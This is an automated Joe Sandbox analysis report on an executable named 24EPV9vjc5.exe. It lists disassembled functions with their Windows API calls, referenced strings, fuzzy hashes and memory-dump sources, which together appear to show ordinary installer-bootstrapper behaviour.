Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: efb6c1f2c7e65877975cc21e497d628b34b5ede71b7e283f261d0aa20062f402
Instruction ID: 050a4eda07315db40356f70118b47b4b568c29577ac174c4f986d036687df058
Opcode Fuzzy Hash: efb6c1f2c7e65877975cc21e497d628b34b5ede71b7e283f261d0aa20062f402
Instruction Fuzzy Hash: D011C632604215AFDB216F94DC84FAE77E6AF54320F25417EFA199F291C7709850CB90

Function 0010563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,000D8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 0010566E
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000D8E97,?), ref: 00105689

Strings

aclutil.cpp, xrefs: 001056AD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: fcf8be0f03e3df4b17254452db9561a74c8175fec6b155badb87b4aca113e89a
Instruction ID: 61f2036f6d426c4ffb8f7ff4b86de3b676ee392329a3422cca8b3cd42a33bf7d
Opcode Fuzzy Hash: fcf8be0f03e3df4b17254452db9561a74c8175fec6b155badb87b4aca113e89a
Instruction Fuzzy Hash: 21017C33801628BBCF229F85CD05EDF7B76EB84750F060115BD8466260C7B38D609ED0

Function 000C158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?,000C2318,00000000,00000000), ref: 000C15D0
GetLastError.KERNEL32(?,000C2318,00000000,00000000,?,00000200,?,001052B2,00000000,?,00000000,?,00000000,00000000,00000000), ref: 000C15DA

Strings

strutil.cpp, xrefs: 000C15FE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 736f97d7cb3a1121b8cfe09dd17b1aae63ca3552496277c4cef7af483d92ee0f
Instruction ID: 22d327656a948638684a1edb97f4259d3e4dd63a62b7ce119002c7415964149c
Opcode Fuzzy Hash: 736f97d7cb3a1121b8cfe09dd17b1aae63ca3552496277c4cef7af483d92ee0f
Instruction Fuzzy Hash: 1A01B93394163577CB219F954C44F9F7AA8EF46760B050118FE50AB252D771DC1087E0

Function 000D57BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000D57D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 000D5833

Strings

Failed to initialize COM on cache thread., xrefs: 000D57E5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: a7e1894db71c0132209c036356b945a3c88390ac7d16610e7453dcd43a8df9b3
Instruction ID: bbbd3c9d3520e30eeb1832f665053d2699d580013b157b47fb3edacf680a07f3
Opcode Fuzzy Hash: a7e1894db71c0132209c036356b945a3c88390ac7d16610e7453dcd43a8df9b3
Instruction Fuzzy Hash: 2A016D72604619BFC7059FA5DC84EDAFBADFF08350B108126FA09D7221DB71AD54DBA0

Function 00103929 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0010396E
SysFreeString.OLEAUT32(00000000), ref: 001039A1

Strings

xmlutil.cpp, xrefs: 0010393F, 00103985

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: ce079701e0f2c5d514e1205cb356b5f5f84ed0b7745dd2f0d640382537211bc0
Instruction ID: 4febf8fe3d7b83a34661f79da4262b8541854b2ff7821718b71cfe35f8a9c8a3
Opcode Fuzzy Hash: ce079701e0f2c5d514e1205cb356b5f5f84ed0b7745dd2f0d640382537211bc0
Instruction Fuzzy Hash: 41018F31649216ABDB201A989C04F7B369CAF41B64F118529FDD0AB381CBF0CD0096D1

Function 001039AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 001039F4
SysFreeString.OLEAUT32(00000000), ref: 00103A27

Strings

xmlutil.cpp, xrefs: 001039C5, 00103A0B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: c87874177e505fc4de8e44c2e4e7c8aa292087897d15cca8910bdf716144e645
Instruction ID: 527aeec61997d3023dea224d19932639697ed9ac122e03d23d68da20a7476349
Opcode Fuzzy Hash: c87874177e505fc4de8e44c2e4e7c8aa292087897d15cca8910bdf716144e645
Instruction Fuzzy Hash: F101AD35B49225BBD7205A99AC09FAB36DCEF41B64F114429FCD4EB381CBF4CE0086A0

Function 00103BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00103A8E,?), ref: 00103C62

Strings

EnableLUA, xrefs: 00103C34
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00103C0C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: 9679c0e007af7e4ba722a470102313af954869353520574b30bcaa24ea12c1d3
Instruction ID: 88d89476b72e0df5b038651ab1f6f4837752cb312d6c943728ec198fab57e7d1
Opcode Fuzzy Hash: 9679c0e007af7e4ba722a470102313af954869353520574b30bcaa24ea12c1d3
Instruction Fuzzy Hash: 1F018432910239FBE7109AA4D906BEEF6ACDB14721F2141A6F980F3091D3B55F90D6D0

Function 000C5123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,000C1104,?,?,00000000), ref: 000C5142
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,000C1104,?,?,00000000), ref: 000C5172

Strings

burn.clean.room, xrefs: 000C512F, 000C513C, 000C5169

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: aa29a1fe7ad96712ad5af9445cf49d97aff53aa9cae9c0dfb40040ae35e13d31
Instruction ID: 341da2d07a13ed5bcd49d1005498dfec1646ca91e074480bbb3facb1d2f016d5
Opcode Fuzzy Hash: aa29a1fe7ad96712ad5af9445cf49d97aff53aa9cae9c0dfb40040ae35e13d31
Instruction Fuzzy Hash: BB016276A006247F87304B49AD88F7BB7ECEF15761B54411AF945C3A50D370ACD1C6A1

Function 001068B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0010690F

Part of subcall function 00108713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00108820
Part of subcall function 00108713: GetLastError.KERNEL32 ref: 0010882A

Strings

clbcatq.dll, xrefs: 001068DC
atomutil.cpp, xrefs: 001068FD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: atomutil.cpp$clbcatq.dll
API String ID: 211557998-3749116663
Opcode ID: 49b12f6698add429645eadea07a2a6b58a5afb36286db1ab777226ba97a9c516
Instruction ID: 9a00fce4d1144ad32489eb7ccd262b6d39058188ad87458c3b759c0cb7e9d53a
Opcode Fuzzy Hash: 49b12f6698add429645eadea07a2a6b58a5afb36286db1ab777226ba97a9c516
Instruction Fuzzy Hash: ED01A2B190122AFFCB209FC5C84189AFBA8FB14364B61817AF584AB550C3B15E20D7D0

Function 000C6522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 000C6534

Part of subcall function 00100ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,000C5EB2,00000000), ref: 00100AE0
Part of subcall function 00100ACC: GetProcAddress.KERNEL32(00000000), ref: 00100AE7
Part of subcall function 00100ACC: GetLastError.KERNEL32(?,?,?,000C5EB2,00000000), ref: 00100AFE

Part of subcall function 000C5CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 000C5D68

Strings

Failed to get 64-bit folder., xrefs: 000C6557
Failed to set variant value., xrefs: 000C6571

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: 4c12df08a8ecb3303aca214b06c74cc7301508fd5b96b16ddf90edf82096e879
Instruction ID: b49103bcb56df14bce28fbcab7cbca764d5d4aa4660aa6c0c90fa10bb21df800
Opcode Fuzzy Hash: 4c12df08a8ecb3303aca214b06c74cc7301508fd5b96b16ddf90edf82096e879
Instruction Fuzzy Hash: DB016232D11628BBCF22AB94DD06F9EBB78EF04761F204159F84066195D7B29F50DAD0

Function 000C33C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000C10DD,?,00000000), ref: 000C33E8
GetLastError.KERNEL32(?,?,?,?,000C10DD,?,00000000), ref: 000C33FF

Strings

pathutil.cpp, xrefs: 000C3423

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: be9f82456d6bf96834b2291ea7145e980ca0ee658d9f98e864c862d81d76416b
Instruction ID: 58a2fe60f08d91d58e57738fe0f62f36333a839f2605fa81bd73425dd417f12e
Opcode Fuzzy Hash: be9f82456d6bf96834b2291ea7145e980ca0ee658d9f98e864c862d81d76416b
Instruction Fuzzy Hash: 6EF0F673A6453167C73257966C45F8FFA98EB46B70B128129FD44FB241DB61EE0082F0

Function 000EE30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 000EEBD2

Part of subcall function 000F1380: RaiseException.KERNEL32(?,?,?,000EEBF4,?,00000000,00000000,?,?,?,?,?,000EEBF4,?,00127EC8), ref: 000F13DF

__CxxThrowException@8.LIBVCRUNTIME ref: 000EEBEF

Strings

Unknown exception, xrefs: 000EEBFC

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 5a815a858039d9534a3b1440200825e486879ae3fd05aa3e3ef7cef7226edfdb
Instruction ID: c87f436f4b4e6e634cf250ff55e5f0705ff21f580c87665c04067f99fcf92c77
Opcode Fuzzy Hash: 5a815a858039d9534a3b1440200825e486879ae3fd05aa3e3ef7cef7226edfdb
Instruction Fuzzy Hash: B9F0C83590028CBECB10BAB6EC4ADEE776C5F00350B504564FD25B28D3EB71EA1596D0

Function 00104A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,774D34C0,?,?,?,000CBA1D,?,?,?,00000000,00000000), ref: 00104A1D
GetLastError.KERNEL32(?,?,?,000CBA1D,?,?,?,00000000,00000000,?,?,?,00000000,7765C3F0,00000000), ref: 00104A27

Strings

fileutil.cpp, xrefs: 00104A4B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: e3602d5d45e46e309e36c605a612b187dfede7ad59bf061e81dc2411fc21d998
Instruction ID: ede3745d152a97ed8f6fc36a26a0ee11128c720b8afc06a4f5f5e438f442493b
Opcode Fuzzy Hash: e3602d5d45e46e309e36c605a612b187dfede7ad59bf061e81dc2411fc21d998
Instruction Fuzzy Hash: 68F0A4B2A44236EBD7149F85994599AFBACEF44720B01411AFE85A7340E7B0AD10C7D4

Function 00103D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,000C5466,?,00000000,000C5466,?,?,?), ref: 00103DA7
CoCreateInstance.OLE32(00000000,00000000,00000001,0012716C,?), ref: 00103DBF

Strings

Microsoft.Update.AutoUpdate, xrefs: 00103DA2

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate
API String ID: 2151042543-675569418
Opcode ID: 2f774aa78da4a0e888259cf6934a43f877b53badf359c27c2e6d1b7ac96ad7c9
Instruction ID: d1b3f9f10ecd7fa02f0f9e30170a5a343a8841b6060be5f74f119bb5f78beba0
Opcode Fuzzy Hash: 2f774aa78da4a0e888259cf6934a43f877b53badf359c27c2e6d1b7ac96ad7c9
Instruction Fuzzy Hash: A1F09A3160020CBFDB00EFA9ED05AEFB7BCEB08700F400025EA01E7290D7B1AA1487A2

Function 001031EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00103200
SysFreeString.OLEAUT32(00000000), ref: 00103230

Strings

xmlutil.cpp, xrefs: 00103214

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 00d6b3bff0c67e52b78cdba06cb1378c8a07ceffe7c37ead17bcf2b5046ff505
Instruction ID: 31ff605d94caf6c0084c0e6f43d1b83fbef620973aedf18d51445a12354b2114
Opcode Fuzzy Hash: 00d6b3bff0c67e52b78cdba06cb1378c8a07ceffe7c37ead17bcf2b5046ff505
Instruction Fuzzy Hash: 45F0BE31102664A7C7310F84AC08FAB77ACAB80B60F258029FC546B390C7B18E5096E0

Function 00103498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 001034AD
SysFreeString.OLEAUT32(00000000), ref: 001034DD

Strings

xmlutil.cpp, xrefs: 001034C4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: e5864e27569ba2c981ceab1af73a803b315309ac79f8e55341565fcbcb884579
Instruction ID: ba27b93bdc531b19bcba72a3ef27e382390d675593ed2bd5392a85457fcdb971
Opcode Fuzzy Hash: e5864e27569ba2c981ceab1af73a803b315309ac79f8e55341565fcbcb884579
Instruction Fuzzy Hash: 8AF0B435245214A7C7331F44AC08E5B77ACEB41B60F21811AFC549F390C7B1DE5096F0

Function 00100E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00100E28

Strings

AdvApi32.dll, xrefs: 00100E0D
RegDeleteKeyExW, xrefs: 00100E1D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: 684ff9cc186335e892b8a975ef58a3528be939093b79cd742ab816712d5d4690
Instruction ID: 242326e0a391a2617fc7a6cad268d06709b1f96aaf9bd382ffcd76d4c756180b
Opcode Fuzzy Hash: 684ff9cc186335e892b8a975ef58a3528be939093b79cd742ab816712d5d4690
Instruction Fuzzy Hash: 9AE0EC7090A361AAC7319B14FC85B467FA1A714B58F054124E404A6DB0D7B648F5CB90

Analysis Process: 24EPV9vjc5.exePID: 7876, Parent PID: 7656COMMON

Executed Functions

Function 0068FEC6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(006BB5FC,00000000,?,?,?,?,0066E93B,8000FFFF,Unexpected return value from message pump.), ref: 0068FEF4
GetCurrentProcessId.KERNEL32(00000000,?,0066E93B,8000FFFF,Unexpected return value from message pump.), ref: 0068FF04
GetCurrentThreadId.KERNEL32 ref: 0068FF0D
GetLocalTime.KERNEL32(8000FFFF,?,0066E93B,8000FFFF,Unexpected return value from message pump.), ref: 0068FF23
LeaveCriticalSection.KERNEL32(006BB5FC,0066E93B,?,00000000,0000FDE9,?,0066E93B,8000FFFF,Unexpected return value from message pump.), ref: 0069001A

Strings

(ek, xrefs: 0068FF5A
,ek, xrefs: 0068FF53
0ek, xrefs: 0068FF70
$ek, xrefs: 0068FF61
%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0068FFC0

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: $ek$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(ek$,ek$0ek
API String ID: 296830338-69559227
Opcode ID: ba383523e5f9100fccf366bb111d0de65e87d14dd83af35a70146e60c9f1d937
Instruction ID: 450b8b028c108165d3365a11de4a67f913c854966423f514615629d937a51a5d
Opcode Fuzzy Hash: ba383523e5f9100fccf366bb111d0de65e87d14dd83af35a70146e60c9f1d937
Instruction Fuzzy Hash: BE418372D01219AFDF219FA4DD04AFEBBBBEB08711F045125FA01E6250E7789D81DBA1

Function 00651070 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006533C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,006510DD,?,00000000), ref: 006533E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 006510F6

Part of subcall function 00651175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 00651186
Part of subcall function 00651175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 00651191
Part of subcall function 00651175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0065119F
Part of subcall function 00651175: GetLastError.KERNEL32(?,?,?,?,?,0065111A,cabinet.dll,00000009,?,?,00000000), ref: 006511BA
